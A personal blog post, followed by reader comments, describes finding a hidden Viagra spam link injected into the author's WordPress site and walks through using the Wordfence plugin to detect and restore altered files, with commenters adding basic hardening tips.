How to Stop Your WordPress Site from being Hacked
Stop the press!!!!
My WordPress blog has been hacked! Well at least I am 99% sure it has anyway. Not sure if anyone else noticed but there has been this in the top left hand corner of the page for god knows how long:
I don’t know how long it has been there* because whenever you are logged into WordPress:
- You can’t see it because of the logged in/ WordPress account bar at the top
- I think the code that was hacked in was clever enough to not show this to a logged in user
So anyway just to clear everything up, I am not peddling Viagra as one of my side hustles, and apologies to everyone who has seen this strange message for the last X days/months!
How to fix your blog if you think you’ve been hacked
Luckily it turned out to be quite easy to fix, but I thought it was worth writing a post about it anyway because it might help others out there who are not sure how to proceed! There is a simple and free plug in to use called Wordfence** that we can use to see if any files have changed from the original WordPress versions. Simply follow these steps to check whether you’ve been hacked:
- CHANGE YOUR PASSWORD!!! ( Maybe to something more secure than password123 🙂 )
- Go to your WordPress Dashboard -> Plugins -> Add New -> Search for “Wordfence”
- Hit “Install”
- Enter your email adress to receive alerts for any future security breaches
- Update all your plug ins and WordPress to the latest versions, then back up all your files, database etc…
- Go to the Options tab in Wordfence and make sure the “Scan core files against repository versions for changes” option is ticked, along with “Scan plugin files” and “Scan theme files”
- Go back to the Scan tab in Wordfence, then hit “Start a Wordfence Scan”. Wait a minute or two
That’s it! Now there are three possible outcomes…
No warnings, not hacked: If you get no issues or warnings, the chances are you haven’t been hacked, great!
If you have some warnings though, it means some of your php or css files have changed from the orignal ones when you first downloaded WordPress, your plug ins and your theme:
Some warnings, not hacked: If you have even minimal technical knowledge, there is every chance you may have made a few updates to your css files (for the styling of your blog) or the php files (say, to include a plug in or a widget at a certain point on your page, that cannot be configured automatically). So just because files have changed doesn’t mean you have 100% been hacked. You now need to use the file change tool to see whether you can identify whether the file updates are your changes, or from some other malicious source (see below)
Some warnings, hacked: If you are certain that you have never changed any of your files, then unfortunately the chances are that you have been hacked!
Using the Wordfence file change Tool to see if you have been hacked
Warnings in Wordfence look like this:
The option you want to click on is “See how the file has changed”. You will then get a screen that looks something like this (click for full size image):
As you can see in my case here, the one on the right, my current “live” file on my site, has some weird function compared to the left hand file, which is the original one that Wordfence is comparing it to (which I assume is stored in some secure database of WordPress files somewhere). This sort of thing should set alarm bells wringing immediately. The random string of letters you can see actually went on for hundreds, if not thousands of characters, which to get slightly technical for a moment, led me to believe that there is some sort of string decoding thing going on, which then perhaps converts that into javascript code, which gets injected into my site and creates the malevolent Viagra link. In laymen’s terms… they screwed me big time. You B**stards!!!!
Once you are sure you have identified file changes that you haven’t made, all you have to do is hit the “Restore the original version of this file”. You need to be careful here because you don’t want to overwrite any deliberate updates you have made and potentially forgotten about!
After I fixed the 3 files that I identified as not updated by myself, I fixed them, refreshed the site and the Viagra hack has now thankfully gone!
Future hack prevention
Luckily, the Wordfence plugin also provides lot’s of great features for future protection as well, such as protection from hackers trying to brute force your WordPress admin password, blocking of known malicious IP Addresses, plus plenty of others! There are many options to set depending on how secure you want your site to be, but please be sure to read up on the consequences of each one before making things “too secure” as you don’t want to end up blocking genuine users! If you are not 100% sure on what something does, best to just leave it to the default settings.
Sayonara Hackers!
Well that’s it really! I would just like to make it clear that I am not going to turn this blog into one that starts to write more and more blog posts about blogging (there are plenty of those out there already!), but just thought that this post might help people out there!
Finally, if anyone out there thinks they have been hacked and are not sure what files have been updated, please feel free to drop me a line! I am pretty experienced with PHP so should be able to spot any malicious code for you.
Anyone else out there had their blog hacked before? Did you find it easy to sort out or was it the bane of your life!? Let us know your hacking experiences in the comments! Cheers!
*If anyone can tell me how long it has been there I would be very grateful! (Just out of interest really!?)
**There is a premium paid version but the free one looks good enough to do the job, so I’m sticking with that! 🙂
Discussion (14) ¬
One of my sites was hacked a couple of years ago and it was a complete pain to resolve. I only noticed it when poking around in the source code. They had embedded a load of links to their sites which were hidden so you wouldn’t notice just by looking at the front end.
Wordfence looks good, I might have a closer look! Thanks!
They can be really sneaky can’t they! I forgot to mention it’s free as well (will update the post now actually!) – they do a premium version but the free one looks to do the job good enough so I’m sticking with that 🙂
Hi TFS
I thought the Viagra was an interesting side-hustle of yours and was waiting for you to blog about it lol!
Hahaha! I knew someone would call me out on my failed side hustle, and then trying to pass it off as my site being hacked! Damn you weenie! 🙂
I’ve always dreaded this happening FIREstarter, as I wasn’t sure what I would do, but this sounds like an awesome solution. I was actually in a coffee shop a few weeks ago, using their wifi, and when I logged into my site and clicked some of my own links it took me to some strange, dodgy sites – I panicked, shut down and got the hell out of there! Haven’t seen anything since, but I’m concerned there could be something hiding in my site, waiting to spring on me again. I’m definitely getting the Wordfence!
Thanks FIREstarter, and sorry you had to deal with this, but it’s great you learnt something from it and can share with others!
Public WiFi can get hacked pretty easily I think, although sometimes it could just be a genuine redirect to some payment page or even just a signup page to the free wifi, if you want to carry on using it etc… So maybe it wasn’t malicious in that instance. Still something to watch out for when you are out and about though! If it looks dodgy, don’t click on anything and close the browser as you rightly did!
Hey let’s be honest… it was pretty lucky that all that happened (hopefully…!) was a silly link about Viagra on my site eh! 🙂
Take a look at hosting it with WP Engine, great WordPress host
Thanks Anon! I have got a 2 year hosting deal with iPage but if I ever need to upgrade or change I will check them out.
Hey TFS – Oh crap…I need to do this on my blog like right now. So so sorry you had to deal with this. I’ve had it up to here with hacked sites and dirty wifi and all that. Thanks for your advice, will get on it!!
Very quick follow-up – Wordfence was SUPER EASY to install and run. Had one minor issue with a file that got changed for Bluehost’s benefit but nothing of concern. Just flipped it back to the vanilla version and was totally fine.
Thanks TFS!!
Hi Mr FC. No problems and thanks for commenting.
Just a quick note… if you know why a file has changed you don’t HAVE to change it back. The idea is only to revert file changes that look dodgy, or you have no idea where the change came from or why it has changed. Bit of a balancing act I know (I am also sure that the bluehost thing wasn’t that important 🙂 )
You can also use the “limit logon attempts” in WordPress / Settings / Limit Logon Attempts. Set it to a really low number with a long time period inbetween. Also change the default WP admin account from “admin”, strong password, etc, etc.
Don’t know about you but my comments get spammed to heck so I use AntiSpam Bee and now everything just gets directed to spam – I don’t even review it anymore
Thanks for the extra tips Mr S!
WordFence also has the login attempts settings with a few extra config options as well, so you can do it all in one place there.
Good point about changing the default account name, I hadn’t thought to do that!
I use Anti Spam Bee as well, the other big one out there is Akismet.
Don’t think those will stop you from getting hacked, but it stops all the comment Spam, which gets ridiculous quite quickly doesn’t it! And yep not worth checking, if someone has written a decent comment and it hasn’t shown up, they will normally email in and you can go and unspam it (this happened to me recently with Akismet!)